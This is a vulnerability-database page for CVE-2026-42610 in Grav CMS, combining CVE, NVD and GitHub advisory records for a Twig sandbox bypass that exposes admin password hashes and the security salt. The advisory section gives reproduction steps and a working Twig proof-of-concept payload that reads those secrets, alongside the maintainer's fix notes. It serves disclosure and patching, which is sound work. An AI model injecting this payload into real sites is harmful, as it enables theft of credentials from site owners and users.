CVE-2026-42610 (GCVE-0-2026-42610)
Vulnerability from cvelistv5 – Published: 2026-05-11 15:19 – Updated: 2026-05-11 15:50
VLAI
Title
Grav: Sensitive Information Disclosure via Accounts Service Bypass
Summary
Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav['accounts'] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt. This vulnerability is fixed in 2.0.0-beta.2.
Severity
6.5 (Medium)
CWE
- CWE-863 - Incorrect Authorization
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/getgrav/grav/security/advisori… | x_refsource_CONFIRM |
| https://github.com/getgrav/grav/commit/c66dfeb5ff… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42610",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-11T15:49:51.347784Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T15:50:03.339Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "grav",
"vendor": "getgrav",
"versions": [
{
"status": "affected",
"version": "\u003c 2.0.0-beta.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav[\u0027accounts\u0027] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt. This vulnerability is fixed in 2.0.0-beta.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863: Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T15:19:35.066Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4"
},
{
"name": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47"
}
],
"source": {
"advisory": "GHSA-3f29-pqwf-v4j4",
"discovery": "UNKNOWN"
},
"title": "Grav: Sensitive Information Disclosure via Accounts Service Bypass"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42610",
"datePublished": "2026-05-11T15:19:35.066Z",
"dateReserved": "2026-04-29T00:31:15.726Z",
"dateUpdated": "2026-05-11T15:50:03.339Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42610",
"date": "2026-05-30",
"epss": "0.00027",
"percentile": "0.08279"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42610\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-11T16:17:33.957\",\"lastModified\":\"2026-05-12T16:16:49.410\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav[\u0027accounts\u0027] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt. This vulnerability is fixed in 2.0.0-beta.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.8.0\",\"matchCriteriaId\":\"9C284702-7909-4A5C-91FE-392FC5BA58C7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:2.0.0:beta1:*:*:*:*:*:*\",\"matchCriteriaId\":\"1ABB323F-20AF-40F3-BCD9-262644D242A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"Grav: Sensitive Information Disclosure via Accounts Service Bypass\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-863\", \"lang\": \"en\", \"description\": \"CWE-863: Incorrect Authorization\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 6.5, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4\"}, {\"name\": \"https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47\"}], \"affected\": [{\"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"version\": \"\u003c 2.0.0-beta.2\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-11T15:19:35.066Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav[\u0027accounts\u0027] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt. This vulnerability is fixed in 2.0.0-beta.2.\"}], \"source\": {\"advisory\": \"GHSA-3f29-pqwf-v4j4\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42610\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-11T15:49:51.347784Z\"}}}], \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-11T15:49:40.974Z\"}}]}",
"cveMetadata": "{\"cveId\": \"CVE-2026-42610\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-04-29T00:31:15.726Z\", \"datePublished\": \"2026-05-11T15:19:35.066Z\", \"dateUpdated\": \"2026-05-11T15:50:03.339Z\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-42610
Vulnerability from fkie_nvd - Published: 2026-05-11 16:17 - Updated: 2026-05-12 16:16
Severity
Summary
Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav['accounts'] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt. This vulnerability is fixed in 2.0.0-beta.2.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9C284702-7909-4A5C-91FE-392FC5BA58C7",
"versionEndIncluding": "1.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:getgrav:grav:2.0.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "1ABB323F-20AF-40F3-BCD9-262644D242A1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Grav is a file-based Web platform. Prior to 2.0.0-beta.2, a low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav[\u0027accounts\u0027] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt. This vulnerability is fixed in 2.0.0-beta.2."
}
],
"id": "CVE-2026-42610",
"lastModified": "2026-05-12T16:16:49.410",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-11T16:17:33.957",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-3F29-PQWF-V4J4
Vulnerability from github – Published: 2026-05-05 21:26 – Updated: 2026-05-13 13:52
VLAI
Summary
Grav Vulnerable to Sensitive Information Disclosure via Accounts Service Bypass
Details
Summary
Information disclosure exists in Grav CMS v1.8.0-beta.29. Despite previous security patches (notably in v1.8.0-beta.27/28) aimed at restricting sensitive object access within the Twig environment, the Accounts Service remains exposed.
A low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the grav['accounts'] service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt.
Affected version
Grav CMS: v1.8.0-beta.29 (and earlier 1.8.x beta versions).
Note: This vulnerability persists even after the vendor attempted to mitigate similar SSTI vectors in earlier beta releases.
Steps to Reproduce
-
Create a low-privileged account (MY CASE IS 'editor_chen') with permissions limited to admin.login and basic page management (create, update, list). Ensure all administrative permissions (Configuration, User Accounts, ...) are explicitly Denied.
-
Login to the Admin panel using
editor_chen. Navigate to Pages and edit theHomepage. -
Under the Advanced tab, ensure Process Twig is enabled .
-
In the Content tab, inject the following Twig payload designed to bypass the
isDangerousFunctionfilter by accessing the internal service container:
---
title: Information Disclosure Test
process:
twig: true
---
# Security Audit Results
- Admin Password Hash: {{ grav['accounts'].load('admin').get('hashed_password') }}
- Security Salt: {{ grav.config.get('security.salt') }}
- Click Save. And navigate to the public page (
http://localhost:8000/home). Page will render and display the administrator's Bcrypt hash and the system security salt.
PoC
---
title: Information Disclosure Test
process:
twig: true
---
# Security Audit Results
- Admin Password Hash: {{ grav['accounts'].load('admin').get('hashed_password') }}
- Security Salt: {{ grav.config.get('security.salt') }}
Impact
Attackers can obtain the password hashes of all registered users, including Super Administrators.
Extracted hashes can be subjected to offline brute-force or dictionary attacks (EX: USE Hashcat)
Video
Pls refer to the attached video
Maintainer note — fix applied (2026-04-24)
Fixed in Grav core on the 2.0 branch: commit d904efc33 — will ship in 2.0.0-beta.2.
What changed: the HMAC key formerly stored as security.salt in user/config/security.yaml has moved out of the Config tree into user/config/security-private.php. On upgrade, the existing salt value is migrated into the new file on first request (preserving CSRF nonces and sessions) and the key is scrubbed from both the live Config object and the on-disk YAML — so {{ grav.config.get('security.salt') }} from a sandboxed Twig template now returns null. The .php extension is blocked from web access by the default user/*.php htaccess rule; the file contains only a return statement, so direct PHP exec produces no output either.
The PoC's password-hash half (grav['accounts'].load('admin').get('hashed_password')) was already covered by the new Twig content sandbox in 2.0.0-beta.2 — UserCollection::load is not in the sandbox allowlist — see the separate GHSA-58hj-46fw-rcfm advisory.
Files:
- system/src/Grav/Common/Security.php — new Security::getNonceKey() + migration.
- system/src/Grav/Common/Utils.php — generateNonceString now uses the new key.
- system/src/Grav/Common/Service/SessionServiceProvider.php.
- system/src/Grav/Common/Config/Setup.php — removed auto-gen of security.salt.
- system/config/security.yaml — removed placeholder salt:.
- tests/unit/Grav/Common/Security/NonceKeySecurityTest.php — migration + generation coverage.
Severity
6.5 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0-beta.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42610"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T21:26:45Z",
"nvd_published_at": "2026-05-11T16:17:33Z",
"severity": "MODERATE"
},
"details": "## Summary\nInformation disclosure exists in `Grav CMS v1.8.0-beta.29`. Despite previous security patches (notably in `v1.8.0-beta.27/28`) aimed at restricting sensitive object access within the Twig environment, the Accounts Service remains exposed.\n\nA low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the `grav[\u0027accounts\u0027]` service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt.\n\n## Affected version\nGrav CMS: `v1.8.0-beta.29` (and earlier 1.8.x beta versions).\n\nNote: This vulnerability persists even after the vendor attempted to mitigate similar SSTI vectors in earlier beta releases.\n\n## Steps to Reproduce\n1. Create a low-privileged account (MY CASE IS \u0027editor_chen\u0027) with permissions limited to admin.login and basic page management (create, update, list). Ensure all administrative permissions (Configuration, User Accounts, ...) are explicitly Denied.\n\n2. Login to the Admin panel using `editor_chen`. Navigate to Pages and edit the `Home` page.\n\n\n3. Under the Advanced tab, ensure Process Twig is enabled .\n\n4. In the Content tab, inject the following Twig payload designed to bypass the `isDangerousFunction` filter by accessing the internal service container:\n```\n---\ntitle: Information Disclosure Test\nprocess:\n twig: true\n---\n# Security Audit Results\n- Admin Password Hash: {{ grav[\u0027accounts\u0027].load(\u0027admin\u0027).get(\u0027hashed_password\u0027) }}\n- Security Salt: {{ grav.config.get(\u0027security.salt\u0027) }}\n```\n\u003cimg width=\"1176\" height=\"618\" alt=\"GRAV\" src=\"https://github.com/user-attachments/assets/7970216a-2dc6-4d1b-8dfd-b64f3712c9c5\" /\u003e\n\n\n5. Click Save. And navigate to the public page (`http://localhost:8000/home`). Page will render and display the administrator\u0027s Bcrypt hash and the system security salt.\n\u003cimg width=\"1278\" height=\"462\" alt=\"GRAV2\" src=\"https://github.com/user-attachments/assets/33b7b894-6ae3-4d29-bd2d-8004e9b343e0\" /\u003e\n\n\n\n\n\n\n\n## PoC\n```\n---\ntitle: Information Disclosure Test\nprocess:\n twig: true\n---\n# Security Audit Results\n- Admin Password Hash: {{ grav[\u0027accounts\u0027].load(\u0027admin\u0027).get(\u0027hashed_password\u0027) }}\n- Security Salt: {{ grav.config.get(\u0027security.salt\u0027) }}\n```\n\n## Impact\nAttackers can obtain the password hashes of all registered users, including Super Administrators.\n\nExtracted hashes can be subjected to offline brute-force or dictionary attacks (EX: USE Hashcat)\n\n## Video\nPls refer to the attached video\n\u003cvideo src=\"https://github.com/user-attachments/assets/74d5ae41-7911-4099-b2cc-e6c51b27c68c\" controls=\"controls\" style=\"max-width: 100%;\"\u003e\n\u003c/video\u003e\n\n\n\n---\n\n## Maintainer note \u2014 fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) \u2014 will ship in **2.0.0-beta.2**.\n\n**What changed:** the HMAC key formerly stored as `security.salt` in `user/config/security.yaml` has moved **out of the Config tree** into `user/config/security-private.php`. On upgrade, the existing salt value is migrated into the new file on first request (preserving CSRF nonces and sessions) and the key is scrubbed from both the live `Config` object and the on-disk YAML \u2014 so `{{ grav.config.get(\u0027security.salt\u0027) }}` from a sandboxed Twig template now returns null. The `.php` extension is blocked from web access by the default `user/*.php` htaccess rule; the file contains only a `return` statement, so direct PHP exec produces no output either.\n\nThe PoC\u0027s password-hash half (`grav[\u0027accounts\u0027].load(\u0027admin\u0027).get(\u0027hashed_password\u0027)`) was already covered by the new Twig content sandbox in 2.0.0-beta.2 \u2014 `UserCollection::load` is not in the sandbox allowlist \u2014 see the separate GHSA-58hj-46fw-rcfm advisory.\n\n**Files:**\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) \u2014 new `Security::getNonceKey()` + migration.\n- [`system/src/Grav/Common/Utils.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Utils.php) \u2014 `generateNonceString` now uses the new key.\n- [`system/src/Grav/Common/Service/SessionServiceProvider.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Service/SessionServiceProvider.php).\n- [`system/src/Grav/Common/Config/Setup.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Config/Setup.php) \u2014 removed auto-gen of `security.salt`.\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) \u2014 removed placeholder `salt:`.\n- [`tests/unit/Grav/Common/Security/NonceKeySecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/NonceKeySecurityTest.php) \u2014 migration + generation coverage.",
"id": "GHSA-3f29-pqwf-v4j4",
"modified": "2026-05-13T13:52:19Z",
"published": "2026-05-05T21:26:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42610"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Grav Vulnerable to Sensitive Information Disclosure via Accounts Service Bypass"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…